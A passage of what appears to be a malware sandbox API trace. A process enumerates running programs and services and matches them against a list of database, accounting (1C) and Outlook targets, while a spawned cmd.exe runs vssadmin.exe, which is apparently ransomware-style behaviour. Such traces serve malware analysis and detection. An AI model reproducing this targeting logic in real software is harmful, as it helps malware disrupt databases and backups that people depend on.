szExeFile="audiodg.exe")) returned 1 [0268.838] lstrlenW (lpString="audiodg.exe") returned 11 [0268.838] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0268.839] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0268.839] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0268.839] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0268.839] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0268.839] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0268.839] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0268.839] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.839] lstrlenW (lpString="svchost.exe") returned 11 [0268.839] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.839] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.839] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.839] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.839] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.839] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.839] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.839] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0268.839] lstrlenW (lpString="userinit.exe") returned 12 [0268.839] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0268.839] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0268.839] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0268.840] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0268.840] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0268.840] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0268.840] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0268.840] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0268.840] lstrlenW (lpString="explorer.exe") returned 12 [0268.840] lstrcmpiW (lpString1="1c8.exe", lpString2="explorer.exe") returned -1 [0268.840] lstrcmpiW (lpString1="1cv77.exe", lpString2="explorer.exe") returned -1 [0268.840] lstrcmpiW (lpString1="outlook.exe", lpString2="explorer.exe") returned 1 [0268.840] lstrcmpiW (lpString1="postgres.exe", lpString2="explorer.exe") returned 1 [0268.840] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="explorer.exe") returned 1 [0268.840] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0268.840] lstrlenW (lpString="dwm.exe") returned 7 [0268.840] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.841] lstrlenW (lpString="svchost.exe") returned 11 [0268.841] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0268.841] lstrlenW (lpString="ivttvf.exe") returned 10 [0268.841] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0268.841] lstrlenW (lpString="spoolsv.exe") returned 11 [0268.841] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0268.842] lstrlenW (lpString="cmd.exe") returned 7 [0268.842] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.842] lstrlenW (lpString="svchost.exe") returned 11 [0268.842] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0268.842] lstrlenW (lpString="conhost.exe") returned 11 [0268.842] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0268.842] lstrlenW (lpString="taskhost.exe") returned 12 [0268.842] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0268.843] lstrlenW (lpString="reader_sl.exe") returned 13 [0268.843] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0268.843] lstrlenW (lpString="dllhost.exe") returned 11 [0268.843] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x540, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0268.843] lstrlenW (lpString="vssadmin.exe") returned 12 [0268.843] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x540, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0268.844] CloseHandle (hObject=0x1b0) returned 1 [0268.844] Sleep (dwMilliseconds=0x1f4) [0269.662] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x42547e0 [0269.987] EnumServicesStatusExW (in: hSCManager=0x42547e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 0 [0269.991] GetLastError () returned 0xea [0269.992] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa08) returned 0x6392c8 [0269.992] EnumServicesStatusExW (in: hSCManager=0x42547e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6392c8, cbBufSize=0xa08, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6392c8, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 1 [0269.995] CloseServiceHandle (hSCObject=0x42547e0) returned 1 [0269.999] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0269.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0269.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0269.999] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0269.999] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0269.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0269.999] lstrlenW (lpString="AudioSrv") returned 8 [0269.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0269.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0269.999] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0269.999] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0269.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0269.999] lstrlenW (lpString="BFE") returned 3 [0269.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0269.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0269.999] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0269.999] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0269.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0269.999] lstrlenW (lpString="CscService") returned 10 [0269.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0269.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0269.999] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0270.000] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0270.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0270.000] lstrlenW (lpString="DcomLaunch") returned 10 [0270.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0270.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0270.000] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0270.000] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0270.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0270.000] lstrlenW (lpString="Dhcp") returned 4 [0270.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0270.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0270.000] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0270.000] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0270.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0270.000] lstrlenW (lpString="Dnscache") returned 8 [0270.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0270.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0270.000] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0270.000] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0270.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0270.000] lstrlenW (lpString="eventlog") returned 8 [0270.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0270.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0270.000] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0270.000] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0270.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0270.000] lstrlenW (lpString="EventSystem") returned 11 [0270.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0270.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0270.000] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0270.000] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0270.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0270.000] lstrlenW (lpString="gpsvc") returned 5 [0270.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0270.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0270.001] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0270.001] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0270.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0270.001] lstrlenW (lpString="lmhosts") returned 7 [0270.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0270.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0270.001] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0270.001] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0270.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0270.001] lstrlenW (lpString="MMCSS") returned 5 [0270.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0270.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0270.001] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0270.001] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0270.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0270.001] lstrlenW (lpString="nsi") returned 3 [0270.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0270.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0270.001] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0270.001] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0270.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0270.001] lstrlenW (lpString="PlugPlay") returned 8 [0270.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0270.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0270.001] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0270.001] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0270.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0270.001] lstrlenW (lpString="Power") returned 5 [0270.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0270.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0270.001] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0270.002] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0270.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0270.002] lstrlenW (lpString="ProfSvc") returned 7 [0270.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0270.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0270.002] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0270.002] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0270.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0270.002] lstrlenW (lpString="RpcEptMapper") returned 12 [0270.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0270.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0270.002] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0270.002] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0270.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0270.002] lstrlenW (lpString="RpcSs") returned 5 [0270.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0270.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0270.002] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0270.002] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0270.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0270.002] lstrlenW (lpString="SamSs") returned 5 [0270.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0270.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0270.002] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0270.002] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0270.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0270.002] lstrlenW (lpString="Schedule") returned 8 [0270.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0270.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0270.002] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0270.002] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0270.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0270.002] lstrlenW (lpString="SENS") returned 4 [0270.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0270.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0270.003] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0270.003] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0270.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0270.003] lstrlenW (lpString="ShellHWDetection") returned 16 [0270.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0270.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0270.003] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0270.003] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0270.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0270.003] lstrlenW (lpString="Spooler") returned 7 [0270.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0270.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0270.003] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0270.003] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0270.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0270.003] lstrlenW (lpString="Themes") returned 6 [0270.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0270.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0270.003] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0270.003] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0270.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0270.003] lstrlenW (lpString="UxSms") returned 5 [0270.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0270.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0270.003] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0270.003] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0270.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0270.003] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6392c8 | out: hHeap=0x5e0000) returned 1 [0270.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d8 [0270.005] Process32FirstW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.005] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0270.005] lstrlenW (lpString="System") returned 6 [0270.005] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0270.005] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0270.005] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0270.005] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0270.005] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0270.005] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0270.005] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0270.005] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0270.006] lstrlenW (lpString="smss.exe") returned 8 [0270.006] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0270.006] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0270.006] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0270.006] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0270.006] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0270.006] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0270.006] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0270.006] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.006] lstrlenW (lpString="csrss.exe") returned 9 [0270.006] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0270.006] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0270.006] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0270.006] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0270.006] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0270.006] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0270.006] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0270.006] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0270.007] lstrlenW (lpString="wininit.exe") returned 11 [0270.007] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0270.007] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0270.007] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0270.007] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0270.007] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0270.007] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0270.007] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0270.007] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.007] lstrlenW (lpString="csrss.exe") returned 9 [0270.007] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0270.007] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0270.007] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0270.007] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0270.007] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0270.007] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0270.007] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0270.007] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0270.008] lstrlenW (lpString="winlogon.exe") returned 12 [0270.008] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0270.008] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0270.008] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0270.008] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0270.008] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0270.008] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0270.008] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0270.008] Process32NextW (in: 